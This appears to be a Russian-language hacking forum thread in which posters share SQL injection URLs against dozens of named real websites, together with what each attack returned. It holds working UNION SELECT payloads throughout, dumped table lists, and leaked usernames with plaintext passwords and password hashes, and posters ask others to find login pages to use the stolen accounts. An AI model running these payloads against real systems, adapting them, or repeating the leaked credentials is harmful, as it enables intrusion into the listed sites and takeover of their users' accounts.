PR 7 http://www.daisy.org/news/news_detail.php?NewsId=-398+UNION+SELECT+1,2,3,4,5,6,7,concat_ws(0x3a,user(),version(),database()),9,10,11,12,13,14,15,16,17,18 daisyorg_kathy@localhost:5.0.75-percona-highperf-b12:daisyorg_daisy2 28 :In database daisyorg_daisy2 found table Contributor 1 : ContributorId 2 : PartnerId 3 : EntryDate 4 : ChangeDate 5 : ChangeId 6 : StartDate 7 : ExpireDate 8 : Password 9 : PasswordDate 10 : NoCookieLogon 11 : Title 12 : FirstName 13 : LastName 14 : OrgFunction 15 : DaisyFunction 16 : SoundFilePath 17 : ImageFilePath 18 : Email 19 : Comment 20 : AccessLevel 21 : IsStaffMember 22 : IsBoardMember 23 : IsProductManager 24 : IsAccountManager 25 : Address 26 : Telephone 27 : Cellphone 28 : Fax 29 : LastVisit 30 : LastUsedEquipment
Code: http://www.delea.ch/en/content/eventidettgm.php?Id=63+union+select+1,2,3,4,5,6,7,8,concat_ws(0x3a,user,password)+from+mysql.user/* nicola:0c035f4940eaac57
PR: 8 перый раз вижу PR:8 http://www.ufmg.br/nej/am/modules/content/index.php?id=-1+union+select+1,2,3,concat_ws(0x3a,version (),database (),user()),5,6,7,8,9,10,11-- http://www.ufmg.br/nej/am/modules/content/index.php?id=-1+union+select+1,2,3,group_concat(table_name),5,6,7,8,9,10,11+from+information_schema.tables+group+by+table_schema+l imit+1,1- - таблы: ohIXq_tld_block_instance,2006_configoption,nejs__config,am__groups_users_link,ohIXq_tld_ranks,nejs__profile_fieldcategory,am__smartsection_mimetypes,2006_users,ohIXq_tld_config,nejs__configoption,am__imagebody,2006_imgset_tplset_link,ohIXq_tld_avatar_user_link,2006_block_module_link,nejs__bannerclient,am__contactplus_elements,ohIXq_tld_newblocks,nejs__newblocks,am__smartsection_categories,2006_tplset,2006_imgset,am__xoopsnotifications,am__block_module_link,ohIXq_tld_xoopscomments,nejs__users,2006_banner,am__profile_category,2006_stories_files,ohIXq_tld_imgset,nejs__imgset,2006_groups_users_link,ohIXq_tld_tplsource,nejs__tplset,am__user_profile,am__banner,ohIXq_tld_groups_users_link,nejs__groups_users_link,am__modules,2006_ranks,ohIXq_tld_block_module_link,2006_contactplus_elements,nejs__configcategory,am__image,ohIXq_tld_session,nejs__ranks,am__smiles,2006_xoopscomments,ohIXq_tld_configcategory,nejs__contactplus_elements,am__imagecategory,2006_imgsetimg,ohIXq_tld_banner,2006_cjaycontent,nejs__bannerfinish,am_ http://www.ufmg.br/nej/am/modules/content/index.php?id=-1+union+select+1,2,3,concat_ws(0x3a,uid,uname,login na me,name,email,user_avatar,pass,rank,level),5,6,7,8,9,10,11+from+nejs__users-- 1:Lyslei Nascimento:lyslei::[email protected]:blank.gif:3f8454b7f2c12cebb1622b6b0dfd1021:7:5 (хрен знает куда вводить,нашел одну какую то , но там глух етот акк) кто найдет ввод, напишите в ЛС плиз))))
http://www.oboefm.ru/note_view.php?note=106&id_notes=14'+union+select+concat_ws(0x2f2a2a2f,database(),version(),user()),2,3,4--+ Гобой FM =))
PR: 6 http://www.pco.org.br/conoticias/ver_sessao.php?id=1&am=20 08-11'+union+select+concat_ws(0x3a,version(),dat abase(),user()),2,3,4,5,6,7,8/* 5.0.24a-locaweb-log:bd_pco:[email protected] смотрим таблы)))но там не итересно)))бб http://www.pco.org.br/conoticias/ver_sessao.php?id=1&am=2008-11'+un ion+select+table_name,2,3,4,5,6,7,8+from+information _schema.tables/* ------------------------------------------------------------------------ PR: 3 http://www.yerevaklur.am/tema.php?id=-1'+union+select+1,concat_ws(0x3a,database(),vers ion(),user()),3,4,5,6,7,8,9,10,11,12,13,14,15,16 ,17,18,19,20/* yerevaklur_lur:5.0.26-log:yerevaklur_lur@localhost
PR: 4 http://www.sesc-am.com.br/atividades/3idade/programacao.php?id=-1+union+select+1,2,3,4,concat_ws(0x3a,database(),version(),user()),6,7-- sesc_am:5.0.27:admin@localhost таблы http://www.sesc-am.com.br/atividades/3idade/progr amacao.php?id=-1+union+select+1,2,3,4,group_concat(table_name),6,7+from+info rmation_schema.tables+group+by+table_schem a-- situacao_anomeses,distribuir,requisicao_pagamento,destino_ci,historico_req_transporte,situacao_transporte,motivo_cancela_reqtransp,usuario,cod_orcamentario,historico_contratacao,situacao_req_estoque,motivo_alteracao_reqtransp,tipo_recurso,calendario,feriado,situacao_controle_outser,devolucao_retirada,sexo,tipo_carga,almoxarifado,motivo_alteracao_ci,situacao_calendario,encaminhar_ci,requisicao_retirada,destino_obs,hora,situacao_usuario,mural,colaborador,historico_envio,situacao_req_pag,motivo_cancela_ci,tipo_retirada,cargo,funcao_colaborador,situacao_devolucao,tipo_destino,anexo_ci,motivo_alteracao_contrat,situacao_ci,endereco_ip,destino_transp,requisicao_transporte,meses,suporte_gic,observacao_ci,contratacao,historico_req_pag,situacao_retirada,motivo_cancela_contrat,unidade,ci,funcao_modulo,situacao_gmt,tipo_doc_requisicao,ano,motivo_alteracao_reqpag,estado_retirada,situacao_circulacao,detalhes_cardtemp,responsavel_setor,suporte_gmt,agenda,minuto,permis_modulo,corunidade,historico_req_retirada,situacao_suport ------------------------------------------------------------------------ http://www.nature-ic.am/heating/project.php?b=2&id=-1+union+select+1,concat_ws(0x3a,da tabase(),version(),us er()),3,4,5,6,7,8,9-- natureic_heating:5.0.67-community-log:natureic_heating@localhost http://www.nature-ic.am/heating/project.php?b=2&id=-1+union+select+1,group_concat(table_name),3,4,5,6,7,8,9+from+informatio n_schema.tables+group+by+table_schema+limi t+1,1-- staff,information_text,news_eng,advisory_text,sem_train,goals,links_eng,report_pilot_proj,cooperation_text_eng,library_eng,project,contact_eng,leg_text_eng,staff_eng,information_text_eng,advisory_text_eng,nister,sem_train_eng,goals_eng,menu,report_pilot_proj_eng,exp_projects,link_types,project_eng,cooperation,legislation,announcement,nister_eng,inter_exp,sem_train_text,information_for,menu_eng,sem_text,exp_projects_eng,link_types_eng,publication,cooperation_eng,legislation_eng,other_projects,announcement_eng,inter_exp_eng,sem_train_text_eng,information_for_eng,news,sem_text_eng,glossary,links,publication_eng,cooperation_text,library,other_projects_eng,contact,leg_text
PR: 6 http://www.24hours.ge/index.php?n=264&r=1&id=1+union+select+1,concat_ws(0x3a,database(),version(),user()),3,4,5,6,7,8,9, 10-- 24hours_eng:5.0.51-log:24hours@localhost http://www.24hours.ge/index.php?n=264&r=1&id=1+union+select+1,table_name,3,4,5,6,7,8,9,10+from+ information_sch ema.t ables-- куча таблов log_users users phpbb_users(форума вообще не нашел) ------------------------------------------------------------------------------- http://mitex.ge/index.php?lang=eng&request=news&id=-1+union+select+1,concat_ws(0x3a,versi on(),data ba se(),user()),3,4,5-- 4.1.7-max-log:mitex:mitex@localhost
Code: http://www.mobil-obchod.cz/category.asp?catcode=-13+union+select+1,2,3,4,group_concat(concat_ws(0x3a,username,password)+separator+0x0a),6,7,8,9,10+from+users/* alfasoft1:alfa1234 andy:andy7890 jirka:jirka456 everybody:everybody
PR: 4 http://www.arigram.gr/en/info_frame.php?id=1+union+select+1,2,3,4,concat_ws(0x3a,database(),versio n(),us er()),6-- arigram_arigram:5.0.67-community:arigram_arigram@localhost ------------------------------------------------------------------------ PR: 2 всем бы такие ))) http://www.greekmuscle.net/gr/profiles/profile.php?id=1+union+select+1,2,concat_ws(0x3a,database(),version(),user()),4,5,6,7,8,9,10,11,12,13--&type=interviewGr 4.1.22-max-log:[email protected]
http://www.ali.web.id/index.php?option=com_mambads&Itemid=ProgenTR&func=view&cacat=-1%20union%20select%201,concat(username,0x3a,password),3%20from%20mos_users-- admin:37538eb37d1b20e60cec3e0030139216 ?? http://www.kolckmann.de/web/index.php?option=com_gmaps&task=viewmap&Itemid 28&mapId=1&Itemid=28index.php?option=com_gmaps&task=viewmap&Itemid=57&%20mapId=-1/**/union/**/select/**/0,username,password,3,4,5,%206,7,8/**/from/**/jos_users/* ADMIN : fc4cfabb7764cd3eb98cc4aa7d1a0a75 ??
PR: 5 http://www.nordic-experts.gr/holarea.php?ID=-1+union+select+1,concat_ws(0x3a,database(),versio n(),u ser()),3-- nexpertsdb:4.0.18:nexperts@localhost ------------------------------------------------------------------------ PR: 6 http://www.notary.ge/index .php?lang=geo&query=regions&id=-1+union+select+concat_ws(0x3a,database (),version(),user())-- notary_main:5.0.67:notary_www@localhost таблы : regions_table,docs_table,statistics_table,english_news_table,types_table,journal_table,users_table,news_table,backup_table колумны таблы users_table: id,user,password,name,type,reg_date http://www.notary.ge/index.php?lang=geo&query=regions&id =-1+union+select+concat_ws(0x3a,id,user,pa ssword,name,type,reg_ date)+from+users_table-- 1:5895700ee4f895f31ecb409f5e380fe7fb9e2524:f22c93f486c3c3e7bb219761a452a5f13c23038f:GM Design Support Team:1:2006-01-31 01:13:00 -------------------------------------------------------------------------- http://www.avocat.gr/main-en.php?menu=practice&submenu=practice&id=-1+union+select+1,2,3,concat_ws(0x3a,database(),version(),user())-- ingcom_avocat:4.1.22-max-log:[email protected] ------------------------------------------------------------------------ PR: 3 http://www.eurolux.com.gr/news.php?id=-1+union+select+1,2,@@version,4,5-- Microsoft SQL Server 2000 - 8.00.2055 (Intel X86) Dec 16 2008 19:46:53 Copyright (c) 1988-2003 Microsoft Corporation Developer Edition on Windows NT 5.2 (Build 3790: Service Pack 2) ------------------------------------------------------------------------ PR: 7 http://erasmus.aegean.gr/ects/grad_allcourses.php?id=1+union+select+1,concat_ws(0x3a,version(),database (),use r()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22-- 5.0.51:ects:ectsuser@localhost
PR: 3 http://dmet.iema.gr/index.php?lang=0&id=-1+union+select+1,concat_ws(0x3a,version(),datab ase(),user ()),3,4,5,6,7,8-- 5.0.45-Debian_1-log:dmet:iema@localhost
Немного скулей от меня: Code: http://www.swissconfort.es/detail-produit.php?id=-1+union+all+select+0,1,2,3,4,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),6,7,8,9,10,11,12,13,14,15-- db info: Code: swisscon3@localhost : swiss_confort_es : 4.1.19 ######################################################### Code: http://www.tuesdaymusic.at/gallery.php?id=-1+union+all+select+0,1,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),3,4,5-- db info: Code: web27@localhost : usr_web27_1 : 5.0.32-Debian_7etch6-log ######################################################## Code: http://www.fondazionemondadori.it/electa/volume.php?item_id=-1+union+all+select+0,1,2,3,4,CONVERT(CONCAT_WS(CHAR(32,58,32),user(),database(),version())%20USING%20latin1),6,7,8,9,10,11,12,13-- db info: Code: [email protected] : fondmond_electa : 4.1.10-log ######################################################## Code: http://www.comitel.it/EN/newsdetail.php?id=-1+union+all+select+0,1,2,3,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),5,6,7,8,9,10-- db info: Code: cominfjv@localhost : cominfjv_comitel : 4.1.22-standard ######################################################### Code: http://www.vipers.mi.it/news.php?id=-1+union+all+select+0,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),2,3,4-- db info: Code: [email protected] : vipersdb : 4.0.16-log #######################################################
http://www.klooun-maroulis.gr/default.php?id=-1'+union+select+1,2,@@version,4,5,6,7/*&lang=en 5.0.45 ################################################### PR: 2 http://soundgeist.gr/index.php?page=article&id=-1+uni on+select+1,2,concat_ws(0x3a,version( ),database(),user()),4-- 4.1.13:soundgeist:soundgeist@localhost
http://cards.ekalaiya.com/getnewsitem.php?newsid=1+union+select+1,2,concat(username,char(45),userpass),4,5+FROM+gc_cardusers-- arun-f24262fc9b726081efce5c1fbebcd71c ??* http://cards.ekalaiya.com/login.php
PR: 3 http://www.hotelstanley.eunet.gr/index.php?user=page&id=-1+union+select+version()-- tables: bookingaff,virtual_pictures,payment,additional_service_pro,sent_documents,affiliatesclicks,textbanner,multiplelanguage,r_stages_status,extra_amenities,weeks,seo_values,invoiced_bids,clients,photo,configure,booking_location_temp,v43_valuegroups,numberofdays2,additional_service_booking,rooms,importeddata,taxe,months,r_bid_actions,document_categories,bookingweeks_temp,bid_xlink,v43_groups,nb_of_properties_agent,realestate_additional_values,halfdaysname,specialweeks,lastminute_frontend2,a_inv_bids,prospectiveresponses,deposit,bookingmonths,aproperties,v43_booking_enquiry_results,n_groups,specialdays,language,a_agentsettings,ratecard_rates2,files,properties_extra_amenities,days,bookingaff_temp,vturl,perioaddays,admin,affiliatespayment,tour_operators,mysqlservers,ratecard_month_intervals,extra_amenities_categories,years,shoppingcart,invoices,clients_orders,photo_multiple,configuremultiple,booking_registry,v43_valuegroupsitems,numberofweeks,additional_service_booking_temp,searchorder,inbox,affiliates,taxes,more_type admins: http://www.hotelstanley.eunet.gr/in dex.php?user=page&id=-1+union+select+group_concat(concat_ws(0x3a,user ,password))+from+admin-- admin:54f751b5099ae0b2f3fd695977ba7c95,bill:2dce159c010d7ac9b77c8c4c94612546,Ovancenna:d645a31508950b4976e9ee86d1863d49,PartOfCar:ebcb419f185d7d602e4b33c5e3aec3bc ??
http://www.pragaviaggi.it/?p=dettaglioPacchetto&idp=-585+union+select+1,2,3,concat_ws(0x3a,@@version_compile_os,version(),database(),user()),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20 Os : pc-linux-gnu Database Version: 4.1.22-standard Database name: pragavia_pragaviaggi User name: pragavia_pragau@localhost
PR: 3 http://www.ritzacapulco.com.mx/ver.php?lang=en&s=gr&id=1+union+select+1,concat_ws(0x3a,version(),data base(),use r()),3,4/* 4.1.22-standard-log:ritzaca_web:[email protected]
PR 8 http://www.coe.ro/stire.php?id=772+AND+(SUBSTRING((version()),1,1))=3/* Version : 3.23.58 User : coe@localhost Database : coe
PR: 4 http://www.travelway.gr/pa ges/en/news.php?id=1+union+select+1,2,3,concat_ws(0x3a,version(),database(),user()),5,6,7--& cmd=read 4.0.16-standard-log:travelway:[email protected]
